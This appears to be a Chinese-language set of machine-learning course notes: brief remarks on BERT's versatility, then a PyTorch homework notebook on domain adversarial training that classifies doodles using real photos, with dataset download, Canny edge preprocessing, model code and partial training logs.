    Self-taught learning 自学习

    • Learning to extract better representation from the source data (unsupervised approach) 学习从源数据中提取更好的表示(无监督方法)
    • Extracting better representation for target data 为目标数据提取更好的表示

    【機器學習 2022】惡搞自督導式學習模型 BERT 的三個故事

    png

    How versatile are self-supervised models?

    自监督模型的通用性如何?

    png

    • Cross-lingual 跨语言
    • Cross-discipline 跨学科
    • Pre-training with artificial data 使用人工数据进行预训练

    Cross-lingual

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Cross-discipline

    png

    用 BERT 做 DNA 分类。

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    png

    Pre-training with artificial data 使用人造数据进行预训练 BERT

    png

    png

    hw11_domain_adaptation

    场景和为什么 Domain Adversarial Training

    ​现在,我们有了已标记的源数据和未标记的目标数据,其中源数据可能与目标数据相关。现在,我们希望仅使用源数据训练模型,并在目标数据上对其进行测试。

    ​如果我们这样做,可能会出现什么问题?在学习了异常检测之后,我们现在知道,如果我们使用从未出现在源数据中的异常数据来测试模型,我们训练的模型很可能会导致性能不佳,因为它不熟悉异常数据。

    例如,我们有一个包含 Feature Extractor 和 Classifier 的模型:

    ​当使用源数据训练模型时,特征提取器 将提取有意义的特征,因为它熟悉它的分布。从下图中可以看出,蓝点(即源数据的分布)已经聚集到不同的集群中。因此,Classifier 可以根据这些集群预测标签。

    ​但是,在对目标数据进行测试时,Feature Extractor 将无法提取遵循源特征分布的有意义的特征,这会导致为源域学习的分类器无法应用于目标域。

    Nerural 网络的域对抗训练 (DaNN)

    ​基于上述问题,DaNN 方法在源(训练时)和目标(测试时)域之间构建映射,以便为源域学习的分类器在与域之间学习的映射组合时也可以应用于目标域。

    在 DaNN 中,作者添加了一个域分类器,这是训练框架中一个深度判别训练的分类器,用于通过特征提取器提取的特征来区分来自不同领域的数据。随着训练的进行,该方法促进了区分源域和目标域的域分类器,以及可以提取对源域上的主要学习任务具有歧视性且对域之间的转换不加区分的特征提取器。

    ​特征提取器的性能可能优于域分类器,因为它的输入是由特征提取器生成的,并且域分类和标签分类的任务并不冲突。

    ​这种方法导致了域不变且位于相同特征分布上的特征的出现。

    数据介绍

    ​我们的任务包含源数据:真实照片和目标数据:手绘涂鸦。

    ​我们将使用照片和标签训练模型,并尝试预测手绘涂鸦的标签是什么。

    ​数据可以在这里下载。下面的代码用于数据下载和可视化。

    ​注意:源数据和目标数据都是平衡数据,您可以使用此信息。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    # Download dataset
    !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.0/real_or_drawing.zip" -O real_or_drawing.zip

    # Download from mirrored dataset link
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.1/real_or_drawing.zip" -O real_or_drawing.zip
    # !wget "https://github.com/redxouls/ml2020spring-hw11-dataset/releases/download/v1.0.2/real_or_drawing.zip" -O real_or_drawing.zip

    # Unzip the files
    !unzip real_or_drawing.zip
    1
    2
    3
    4
    5
    6
    7
    Streaming output truncated to the last 5000 lines.
    inflating: real_or_drawing/train_data/0/106.bmp
    inflating: real_or_drawing/train_data/0/107.bmp
    inflating: real_or_drawing/train_data/0/108.bmp
    inflating: real_or_drawing/train_data/0/109.bmp
    inflating: real_or_drawing/train_data/0/11.bmp
    ...
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    import matplotlib.pyplot as plt

    def no_axis_show(img, title='', cmap=None):
    # imshow, and set the interpolation mode to be "nearest"。
    fig = plt.imshow(img, interpolation='nearest', cmap=cmap)
    # do not show the axes in the images.
    fig.axes.get_xaxis().set_visible(False)
    fig.axes.get_yaxis().set_visible(False)
    plt.title(title)

    titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
    plt.figure(figsize=(18, 18))
    for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/train_data/{i}/{500*i}.bmp'), title=titles[i])

    png

    1
    2
    3
    4
    plt.figure(figsize=(18, 18))
    for i in range(10):
    plt.subplot(1, 10, i+1)
    fig = no_axis_show(plt.imread(f'real_or_drawing/test_data/0/' + str(i).rjust(5, '0') + '.bmp'))

    png

    特殊领域知识

    ​我们在涂鸦时,通常只画轮廓,因此我们可以对源数据进行边缘检测处理,使其与目标数据更加相似。

    Canny 边缘检测

    ​Canny Edge Detection 的实现如下。 此处不会详细描述该算法。如果您有兴趣,请参考 wiki 或这里

    ​我们只需要两个参数即可使用 CV2 实现 Canny Edge Detection:low_thresholdhigh_threshold

    1
    cv2.Canny(image, low_threshold, high_threshold)

    ​简单地说,当边值超过 high_threshold 时,我们将其确定为边。如果边值仅高于 low_threshold,我们将确定它是否为边。

    ​让我们在源数据上实现它。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    import cv2
    import matplotlib.pyplot as plt
    titles = ['horse', 'bed', 'clock', 'apple', 'cat', 'plane', 'television', 'dog', 'dolphin', 'spider']
    plt.figure(figsize=(18, 18))

    original_img = plt.imread(f'real_or_drawing/train_data/0/0.bmp')
    plt.subplot(1, 5, 1)
    no_axis_show(original_img, title='original')

    gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
    plt.subplot(1, 5, 2)
    no_axis_show(gray_img, title='gray scale', cmap='gray')

    gray_img = cv2.cvtColor(original_img, cv2.COLOR_RGB2GRAY)
    plt.subplot(1, 5, 2)
    no_axis_show(gray_img, title='gray scale', cmap='gray')

    canny_50100 = cv2.Canny(gray_img, 50, 100)
    plt.subplot(1, 5, 3)
    no_axis_show(canny_50100, title='Canny(50, 100)', cmap='gray')

    canny_150200 = cv2.Canny(gray_img, 150, 200)
    plt.subplot(1, 5, 4)
    no_axis_show(canny_150200, title='Canny(150, 200)', cmap='gray')

    canny_250300 = cv2.Canny(gray_img, 250, 300)
    plt.subplot(1, 5, 5)
    no_axis_show(canny_250300, title='Canny(250, 300)', cmap='gray')

    png

    数据处理

    ​数据适用于 。您可以使用 创建数据集。图像增广的详细信息请参考以下代码中的注释。torchvision.ImageFolder torchvision.ImageFolder

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    import numpy as np
    import torch # 张量操作
    import torch.nn as nn # 神经网络层
    import torch.nn.functional as F
    from torch.autograd import Function # 自动微分

    import torch.optim as optim # 优化器
    import torchvision.transforms as transforms
    from torchvision.datasets import ImageFolder
    from torch.utils.data import DataLoader

    # source_transform 使用 Canny 算法进行边缘检测,然后应用了一些数据增强操作,如翻转和旋转。
    source_transform = transforms.Compose([
    # Turn RGB to grayscale. (Bacause Canny do not support RGB images.)
    transforms.Grayscale(), # 转换为灰度图
    # cv2 do not support skimage.Image, so we transform it to np.array,
    # and then adopt cv2.Canny algorithm.
    transforms.Lambda(lambda x: cv2.Canny(np.array(x), 170, 300)), # 应用 Canny 边缘检测
    # Transform np.array back to the skimage.Image.
    transforms.ToPILImage(), # 转换为 PIL 图像对象
    # 50% Horizontal Flip. (For Augmentation)
    transforms.RandomHorizontalFlip(), # 50% 概率水平翻转
    # Rotate +- 15 degrees. (For Augmentation), and filled with zero
    # if there's empty pixel after rotation.
    transforms.RandomRotation(15, fill=(0,)), # 旋转 ±15 度,空白像素填充为 0
    # Transform to tensor for model inputs.
    transforms.ToTensor(), # 转换为 PyTorch 张量
    ])

    # target_transform 则不包含边缘检测,而是对图像大小进行了调整(从 28x28 调整到 32x32),以便与训练数据一致。
    target_transform = transforms.Compose([
    # Turn RGB to grayscale.
    transforms.Grayscale(),
    # Resize: size of source data is 32x32, thus we need to
    # enlarge the size of target data from 28x28 to 32x32。
    transforms.Resize((32, 32)), # 调整大小到 32x32
    # 50% Horizontal Flip. (For Augmentation)
    transforms.RandomHorizontalFlip(),
    # Rotate +- 15 degrees. (For Augmentation), and filled with zero
    # if there's empty pixel after rotation.
    transforms.RandomRotation(15, fill=(0,)),
    # Transform to tensor for model inputs.
    transforms.ToTensor(),
    ])

    # ImageFolder 类从指定路径加载图像文件夹中的数据,并将 source_transform 和 target_transform 应用于图像数据。
    source_dataset = ImageFolder('real_or_drawing/train_data', transform=source_transform)
    target_dataset = ImageFolder('real_or_drawing/test_data', transform=target_transform)

    # 这里的 DataLoader 为训练和测试集创建批量加载器,将数据分批次加载到模型中。
    # batch_size=32 表示每个批次包含 32 张图像,shuffle=True 用于随机打乱训练集的顺序,有助于减少过拟合。
    # test_dataloader 用于加载测试数据,shuffle=False 表示测试集的顺序不会被打乱。
    source_dataloader = DataLoader(source_dataset, batch_size=32, shuffle=True)
    target_dataloader = DataLoader(target_dataset, batch_size=32, shuffle=True)
    test_dataloader = DataLoader(target_dataset, batch_size=128, shuffle=False)

    模型

    ​Feature Extractor:经典 VGG 式架构

    ​标签预测器/域分类器:线性模型。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    class FeatureExtractor(nn.Module):

    def __init__(self):
    super(FeatureExtractor, self).__init__()

    # FeatureExtractor 是一个卷积神经网络,用于从输入图像中提取高维特征。该模块包含 5 个卷积层块,每个块包括:
    self.conv = nn.Sequential(
    nn.Conv2d(1, 64, 3, 1, 1), # 一个卷积层(Conv2d)用于提取空间特征;
    nn.BatchNorm2d(64), # 批归一化层(BatchNorm2d),用于稳定训练过程;
    nn.ReLU(), # ReLU 激活函数,使网络具有非线性;
    nn.MaxPool2d(2), # 最大池化层(MaxPool2d),用于下采样和减少特征图的尺寸。

    nn.Conv2d(64, 128, 3, 1, 1),
    nn.BatchNorm2d(128),
    nn.ReLU(),
    nn.MaxPool2d(2),

    nn.Conv2d(128, 256, 3, 1, 1),
    nn.BatchNorm2d(256),
    nn.ReLU(),
    nn.MaxPool2d(2),

    nn.Conv2d(256, 256, 3, 1, 1),
    nn.BatchNorm2d(256),
    nn.ReLU(),
    nn.MaxPool2d(2),

    nn.Conv2d(256, 512, 3, 1, 1),
    nn.BatchNorm2d(512),
    nn.ReLU(),
    nn.MaxPool2d(2)
    )

    def forward(self, x):
    x = self.conv(x).squeeze()
    return x

    class LabelPredictor(nn.Module):

    def __init__(self):
    super(LabelPredictor, self).__init__()

    self.layer = nn.Sequential(
    nn.Linear(512, 512), # 第一和第二层是 512 维输入和 512 维输出的全连接层,分别通过 ReLU 激活;
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.ReLU(),

    nn.Linear(512, 10), # 最后一层是一个全连接层,输出大小为 10,用于分类。
    )

    def forward(self, h):
    c = self.layer(h)
    return c

    class DomainClassifier(nn.Module):

    def __init__(self):
    super(DomainClassifier, self).__init__()

    self.layer = nn.Sequential(
    nn.Linear(512, 512), # 每个隐藏层之后都有批归一化(BatchNorm1d)和 ReLU 激活。
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 512),
    nn.BatchNorm1d(512),
    nn.ReLU(),

    nn.Linear(512, 1), # 最后一层是一个单神经元输出层(Linear(512, 1)),用于预测域标签。
    )

    def forward(self, h):
    y = self.layer(h)
    return y

    预处理

    ​在这里,我们使用 Adam 作为我们的优化器。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    # 初始化模型并将其移动到 GPU
    feature_extractor = FeatureExtractor().cuda()
    label_predictor = LabelPredictor().cuda()
    domain_classifier = DomainClassifier().cuda()

    # 定义损失函数
    class_criterion = nn.CrossEntropyLoss() # 交叉熵损失函数,用于分类任务。它会在 LabelPredictor 输出的类别概率分布和真实标签之间计算损失。
    domain_criterion = nn.BCEWithLogitsLoss() # 二元交叉熵损失(带 Logits,即自动处理 sigmoid 函数),用于二分类任务。这里用于计算 DomainClassifier 的域分类损失(判断样本属于哪个域),即通过二值标签来判断样本来自哪个数据分布。

    # 每个优化器使用 Adam 优化算法(optim.Adam),适合处理深度学习任务中的大量参数和梯度不稳定的问题。
    optimizer_F = optim.Adam(feature_extractor.parameters())
    optimizer_C = optim.Adam(label_predictor.parameters())
    optimizer_D = optim.Adam(domain_classifier.parameters())

    开始训练

    DaNN 实施

    ​在原始论文中,使用了 Gradient Reversal Layer。 Feature Extractor、Label Predictor 和 Domain Classifier 都同时进行训练。在这段代码中,我们首先训练 Domain Classifier,然后训练我们的 Feature Extractor(与 GAN 中的 Generator 和 Discriminator 训练过程的概念相同)。

    提醒

    • 控制域对抗性损失的 Lambda 在原始论文中是自适应的。您可以参考原著。此处 lambda 设置为 0.1。
    • 我们没有用于目标数据的标签,您只能通过将结果上传到 kaggle 来评估您的模型:)
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    def train_epoch(source_dataloader, target_dataloader, lamb):
    '''
    Args:
    source_dataloader: source data 的 dataloader
    target_dataloader: target data 的 dataloader
    lamb: control the balance of domain adaptatoin and classification. 控制域适配与分类之间的平衡
    '''

    # D loss: Domain Classifier 的 loss
    # F loss: Feature Extrator & Label Predictor 的 loss
    # running_D_loss 用于累计域分类器的损失;
    # running_F_loss 用于累计特征提取器和标签分类器的损失;
    running_D_loss, running_F_loss = 0.0, 0.0
    # total_hit 和 total_num 用于计算源域的分类准确率。
    total_hit, total_num = 0.0, 0.0

    for i, ((source_data, source_label), (target_data, _)) in enumerate(zip(source_dataloader, target_dataloader)):
    # 这个循环同时迭代源域和目标域的数据批次。每次迭代中,source_data 和 source_label 为源域的图像和标签,target_data 为目标域的图像。
    source_data = source_data.cuda()
    source_label = source_label.cuda()
    target_data = target_data.cuda()

    # Mixed the source data and target data, or it'll mislead the running params
    # of batch_norm. (runnning mean/var of soucre and target data are different.)
    mixed_data = torch.cat([source_data, target_data], dim=0)
    domain_label = torch.zeros([source_data.shape[0] + target_data.shape[0], 1]).cuda()
    # set domain label of source data to be 1.
    domain_label[:source_data.shape[0]] = 1

    # Step 1 : train domain classifier
    # 第一步:训练域分类器
    # 提取合并数据的特征 feature,feature.detach() 防止梯度反向传播到 feature_extractor。
    feature = feature_extractor(mixed_data)
    # We don't need to train feature extractor in step 1.
    # Thus we detach the feature neuron to avoid backpropgation.
    domain_logits = domain_classifier(feature.detach())
    # 使用域标签 domain_label 和预测的 domain_logits 计算域分类损失 loss。
    loss = domain_criterion(domain_logits, domain_label)
    running_D_loss += loss.item()
    loss.backward()
    optimizer_D.step()

    # Step 2 : train feature extractor and label classifier
    # 第二步:训练特征提取器和标签分类器
    # class_logits 是标签分类器的预测结果,用于源域的分类。
    class_logits = label_predictor(feature[:source_data.shape[0]])
    # domain_logits 用于域分类。
    domain_logits = domain_classifier(feature)
    # loss = cross entropy of classification - lamb * domain binary cross entropy.
    # The reason why using subtraction is similar to generator loss in disciminator of GAN
    # 损失函数包括源域的分类损失 class_criterion(class_logits, source_label) 和域适配损失 domain_criterion(domain_logits, domain_label),两者相减以达到类似对抗训练的效果。
    loss = class_criterion(class_logits, source_label) - lamb * domain_criterion(domain_logits, domain_label)
    running_F_loss += loss.item()
    loss.backward()
    # 更新 feature_extractor 和 label_predictor 的参数。
    # 每次训练批次后清零梯度,并计算源域的分类准确率。
    optimizer_F.step()
    optimizer_C.step()

    optimizer_D.zero_grad()
    optimizer_F.zero_grad()
    optimizer_C.zero_grad()

    total_hit += torch.sum(torch.argmax(class_logits, dim=1) == source_label).item()
    total_num += source_data.shape[0]
    print(i, end='\r')

    return running_D_loss / (i+1), running_F_loss / (i+1), total_hit / total_num

    # train 200 epochs
    # 在 200 个 epoch 中循环,每次 epoch 后保存模型参数并输出训练的损失和准确率。
    for epoch in range(200):

    train_D_loss, train_F_loss, train_acc = train_epoch(source_dataloader, target_dataloader, lamb=0.1)

    torch.save(feature_extractor.state_dict(), f'extractor_model.bin')
    torch.save(label_predictor.state_dict(), f'predictor_model.bin')

    print('epoch {:>3d}: train D loss: {:6.4f}, train F loss: {:6.4f}, acc {:6.4f}'.format(epoch, train_D_loss, train_F_loss, train_acc))
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    181
    182
    183
    184
    185
    186
    187
    188
    189
    190
    191
    192
    193
    194
    195
    196
    197
    198
    199
    200
    epoch   0: train D loss: 0.6715, train F loss: 1.8669, acc 0.2928
    epoch 1: train D loss: 0.6264, train F loss: 1.5707, acc 0.4166
    epoch 2: train D loss: 0.5412, train F loss: 1.4445, acc 0.4794
    epoch 3: train D loss: 0.5390, train F loss: 1.3692, acc 0.4992
    epoch 4: train D loss: 0.5540, train F loss: 1.3243, acc 0.5140
    epoch 5: train D loss: 0.5439, train F loss: 1.2459, acc 0.5480
    epoch 6: train D loss: 0.5538, train F loss: 1.2264, acc 0.5482
    epoch 7: train D loss: 0.5369, train F loss: 1.1544, acc 0.5800
    epoch 8: train D loss: 0.5194, train F loss: 1.1397, acc 0.5838
    epoch 9: train D loss: 0.5368, train F loss: 1.0921, acc 0.5950
    epoch 10: train D loss: 0.5298, train F loss: 1.0657, acc 0.6070
    epoch 11: train D loss: 0.5146, train F loss: 1.0287, acc 0.6186
    epoch 12: train D loss: 0.5331, train F loss: 0.9963, acc 0.6338
    epoch 13: train D loss: 0.5301, train F loss: 0.9842, acc 0.6412
    epoch 14: train D loss: 0.5383, train F loss: 0.9447, acc 0.6488
    epoch 15: train D loss: 0.5252, train F loss: 0.9263, acc 0.6560
    epoch 16: train D loss: 0.5268, train F loss: 0.8820, acc 0.6748
    epoch 17: train D loss: 0.5110, train F loss: 0.8503, acc 0.6848
    epoch 18: train D loss: 0.4955, train F loss: 0.8061, acc 0.7070
    epoch 19: train D loss: 0.5145, train F loss: 0.7806, acc 0.7096
    epoch 20: train D loss: 0.4760, train F loss: 0.7562, acc 0.7194
    epoch 21: train D loss: 0.4721, train F loss: 0.7087, acc 0.7350
    epoch 22: train D loss: 0.4876, train F loss: 0.6906, acc 0.7458
    epoch 23: train D loss: 0.4821, train F loss: 0.6563, acc 0.7580
    epoch 24: train D loss: 0.4547, train F loss: 0.6063, acc 0.7780
    epoch 25: train D loss: 0.4642, train F loss: 0.6035, acc 0.7788
    epoch 26: train D loss: 0.4758, train F loss: 0.5768, acc 0.7826
    epoch 27: train D loss: 0.4539, train F loss: 0.5465, acc 0.7956
    epoch 28: train D loss: 0.4447, train F loss: 0.4864, acc 0.8144
    epoch 29: train D loss: 0.4610, train F loss: 0.5191, acc 0.8064
    epoch 30: train D loss: 0.4341, train F loss: 0.4504, acc 0.8372
    epoch 31: train D loss: 0.4363, train F loss: 0.4291, acc 0.8380
    epoch 32: train D loss: 0.4493, train F loss: 0.4082, acc 0.8508
    epoch 33: train D loss: 0.4308, train F loss: 0.3958, acc 0.8506
    epoch 34: train D loss: 0.4318, train F loss: 0.3513, acc 0.8658
    epoch 35: train D loss: 0.4356, train F loss: 0.3378, acc 0.8708
    epoch 36: train D loss: 0.3975, train F loss: 0.3467, acc 0.8684
    epoch 37: train D loss: 0.4213, train F loss: 0.3099, acc 0.8794
    epoch 38: train D loss: 0.3939, train F loss: 0.2874, acc 0.8900
    epoch 39: train D loss: 0.4279, train F loss: 0.3113, acc 0.8826
    epoch 40: train D loss: 0.4045, train F loss: 0.2726, acc 0.8916
    epoch 41: train D loss: 0.4015, train F loss: 0.2682, acc 0.8974
    epoch 42: train D loss: 0.3976, train F loss: 0.2458, acc 0.9062
    epoch 43: train D loss: 0.4092, train F loss: 0.2502, acc 0.9026
    epoch 44: train D loss: 0.3983, train F loss: 0.2196, acc 0.9120
    epoch 45: train D loss: 0.3920, train F loss: 0.2242, acc 0.9158
    epoch 46: train D loss: 0.4072, train F loss: 0.2050, acc 0.9168
    epoch 47: train D loss: 0.3964, train F loss: 0.1852, acc 0.9272
    epoch 48: train D loss: 0.4001, train F loss: 0.2130, acc 0.9172
    epoch 49: train D loss: 0.3910, train F loss: 0.1914, acc 0.9248
    epoch 50: train D loss: 0.3924, train F loss: 0.1978, acc 0.9228
    epoch 51: train D loss: 0.3916, train F loss: 0.1758, acc 0.9262
    epoch 52: train D loss: 0.3843, train F loss: 0.1651, acc 0.9314
    epoch 53: train D loss: 0.3681, train F loss: 0.1555, acc 0.9352
    epoch 54: train D loss: 0.3960, train F loss: 0.1557, acc 0.9320
    epoch 55: train D loss: 0.3765, train F loss: 0.1543, acc 0.9356
    epoch 56: train D loss: 0.3789, train F loss: 0.1420, acc 0.9406
    epoch 57: train D loss: 0.3878, train F loss: 0.1423, acc 0.9418
    epoch 58: train D loss: 0.3799, train F loss: 0.1477, acc 0.9396
    epoch 59: train D loss: 0.3710, train F loss: 0.1316, acc 0.9450
    epoch 60: train D loss: 0.3815, train F loss: 0.1294, acc 0.9456
    epoch 61: train D loss: 0.3789, train F loss: 0.1300, acc 0.9466
    epoch 62: train D loss: 0.3912, train F loss: 0.1273, acc 0.9472
    epoch 63: train D loss: 0.4002, train F loss: 0.1206, acc 0.9492
    epoch 64: train D loss: 0.3895, train F loss: 0.1332, acc 0.9432
    epoch 65: train D loss: 0.3853, train F loss: 0.1152, acc 0.9518
    epoch 66: train D loss: 0.3878, train F loss: 0.1420, acc 0.9424
    epoch 67: train D loss: 0.3823, train F loss: 0.1158, acc 0.9478
    epoch 68: train D loss: 0.3798, train F loss: 0.1131, acc 0.9514
    epoch 69: train D loss: 0.3736, train F loss: 0.1022, acc 0.9508
    epoch 70: train D loss: 0.3749, train F loss: 0.1215, acc 0.9498
    epoch 71: train D loss: 0.3752, train F loss: 0.0972, acc 0.9572
    epoch 72: train D loss: 0.3745, train F loss: 0.1077, acc 0.9558
    epoch 73: train D loss: 0.3694, train F loss: 0.1041, acc 0.9562
    epoch 74: train D loss: 0.3717, train F loss: 0.0976, acc 0.9534
    epoch 75: train D loss: 0.3718, train F loss: 0.1092, acc 0.9552
    epoch 76: train D loss: 0.3717, train F loss: 0.0744, acc 0.9648
    epoch 77: train D loss: 0.3794, train F loss: 0.0861, acc 0.9590
    epoch 78: train D loss: 0.3652, train F loss: 0.1077, acc 0.9586
    epoch 79: train D loss: 0.3774, train F loss: 0.0617, acc 0.9674
    epoch 80: train D loss: 0.3712, train F loss: 0.0974, acc 0.9582
    epoch 81: train D loss: 0.3725, train F loss: 0.1011, acc 0.9546
    epoch 82: train D loss: 0.3812, train F loss: 0.0931, acc 0.9596
    epoch 83: train D loss: 0.3720, train F loss: 0.0634, acc 0.9668
    epoch 84: train D loss: 0.3752, train F loss: 0.0738, acc 0.9666
    epoch 85: train D loss: 0.3851, train F loss: 0.1143, acc 0.9536
    epoch 86: train D loss: 0.3821, train F loss: 0.0813, acc 0.9618
    epoch 87: train D loss: 0.3911, train F loss: 0.0735, acc 0.9648
    epoch 88: train D loss: 0.3837, train F loss: 0.0832, acc 0.9604
    epoch 89: train D loss: 0.3884, train F loss: 0.0757, acc 0.9624
    epoch 90: train D loss: 0.3728, train F loss: 0.0761, acc 0.9640
    epoch 91: train D loss: 0.3969, train F loss: 0.0718, acc 0.9632
    epoch 92: train D loss: 0.3646, train F loss: 0.0668, acc 0.9632
    epoch 93: train D loss: 0.3808, train F loss: 0.0756, acc 0.9662
    epoch 94: train D loss: 0.3650, train F loss: 0.0818, acc 0.9628
    epoch 95: train D loss: 0.3781, train F loss: 0.0610, acc 0.9682
    epoch 96: train D loss: 0.3837, train F loss: 0.0587, acc 0.9684
    epoch 97: train D loss: 0.3809, train F loss: 0.0591, acc 0.9680
    epoch 98: train D loss: 0.3714, train F loss: 0.0626, acc 0.9670
    epoch 99: train D loss: 0.3909, train F loss: 0.0753, acc 0.9632
    epoch 100: train D loss: 0.3641, train F loss: 0.0607, acc 0.9696
    epoch 101: train D loss: 0.3730, train F loss: 0.0853, acc 0.9612
    epoch 102: train D loss: 0.3746, train F loss: 0.0511, acc 0.9706
    epoch 103: train D loss: 0.3831, train F loss: 0.0493, acc 0.9700
    epoch 104: train D loss: 0.3882, train F loss: 0.0751, acc 0.9622
    epoch 105: train D loss: 0.3777, train F loss: 0.0508, acc 0.9726
    epoch 106: train D loss: 0.3702, train F loss: 0.0462, acc 0.9732
    epoch 107: train D loss: 0.3694, train F loss: 0.0542, acc 0.9734
    epoch 108: train D loss: 0.3700, train F loss: 0.0520, acc 0.9712
    epoch 109: train D loss: 0.3596, train F loss: 0.0439, acc 0.9738
    epoch 110: train D loss: 0.3681, train F loss: 0.0544, acc 0.9688
    epoch 111: train D loss: 0.3840, train F loss: 0.0592, acc 0.9674
    epoch 112: train D loss: 0.3770, train F loss: 0.0624, acc 0.9682
    epoch 113: train D loss: 0.3644, train F loss: 0.0531, acc 0.9720
    epoch 114: train D loss: 0.3787, train F loss: 0.0566, acc 0.9712
    epoch 115: train D loss: 0.3720, train F loss: 0.0429, acc 0.9746
    epoch 116: train D loss: 0.3768, train F loss: 0.0489, acc 0.9732
    epoch 117: train D loss: 0.3765, train F loss: 0.0412, acc 0.9748
    epoch 118: train D loss: 0.3820, train F loss: 0.0450, acc 0.9724
    epoch 119: train D loss: 0.3735, train F loss: 0.0386, acc 0.9768
    epoch 120: train D loss: 0.3774, train F loss: 0.0436, acc 0.9736
    epoch 121: train D loss: 0.3816, train F loss: 0.0491, acc 0.9708
    epoch 122: train D loss: 0.3717, train F loss: 0.0587, acc 0.9686
    epoch 123: train D loss: 0.3802, train F loss: 0.0538, acc 0.9714
    epoch 124: train D loss: 0.3878, train F loss: 0.0432, acc 0.9762
    epoch 125: train D loss: 0.3785, train F loss: 0.0453, acc 0.9746
    epoch 126: train D loss: 0.3749, train F loss: 0.0423, acc 0.9774
    epoch 127: train D loss: 0.3925, train F loss: 0.0328, acc 0.9766
    epoch 128: train D loss: 0.3874, train F loss: 0.0546, acc 0.9682
    epoch 129: train D loss: 0.3843, train F loss: 0.0482, acc 0.9712
    epoch 130: train D loss: 0.3698, train F loss: 0.0500, acc 0.9736
    epoch 131: train D loss: 0.3752, train F loss: 0.0368, acc 0.9762
    epoch 132: train D loss: 0.3818, train F loss: 0.0303, acc 0.9784
    epoch 133: train D loss: 0.3838, train F loss: 0.0490, acc 0.9722
    epoch 134: train D loss: 0.3744, train F loss: 0.0332, acc 0.9792
    epoch 135: train D loss: 0.3743, train F loss: 0.0311, acc 0.9786
    epoch 136: train D loss: 0.3838, train F loss: 0.0419, acc 0.9728
    epoch 137: train D loss: 0.3951, train F loss: 0.0352, acc 0.9760
    epoch 138: train D loss: 0.3878, train F loss: 0.0439, acc 0.9732
    epoch 139: train D loss: 0.3879, train F loss: 0.0419, acc 0.9736
    epoch 140: train D loss: 0.3871, train F loss: 0.0355, acc 0.9758
    epoch 141: train D loss: 0.3819, train F loss: 0.0392, acc 0.9746
    epoch 142: train D loss: 0.3905, train F loss: 0.0578, acc 0.9722
    epoch 143: train D loss: 0.3816, train F loss: 0.0350, acc 0.9758
    epoch 144: train D loss: 0.3899, train F loss: 0.0175, acc 0.9822
    epoch 145: train D loss: 0.4025, train F loss: 0.0469, acc 0.9748
    epoch 146: train D loss: 0.3715, train F loss: 0.0345, acc 0.9748
    epoch 147: train D loss: 0.3841, train F loss: 0.0375, acc 0.9744
    epoch 148: train D loss: 0.3833, train F loss: 0.0310, acc 0.9802
    epoch 149: train D loss: 0.3805, train F loss: 0.0263, acc 0.9764
    epoch 150: train D loss: 0.3763, train F loss: 0.0352, acc 0.9760
    epoch 151: train D loss: 0.3861, train F loss: 0.0330, acc 0.9778
    epoch 152: train D loss: 0.3844, train F loss: 0.0340, acc 0.9764
    epoch 153: train D loss: 0.3902, train F loss: 0.0311, acc 0.9764
    epoch 154: train D loss: 0.3782, train F loss: 0.0387, acc 0.9760
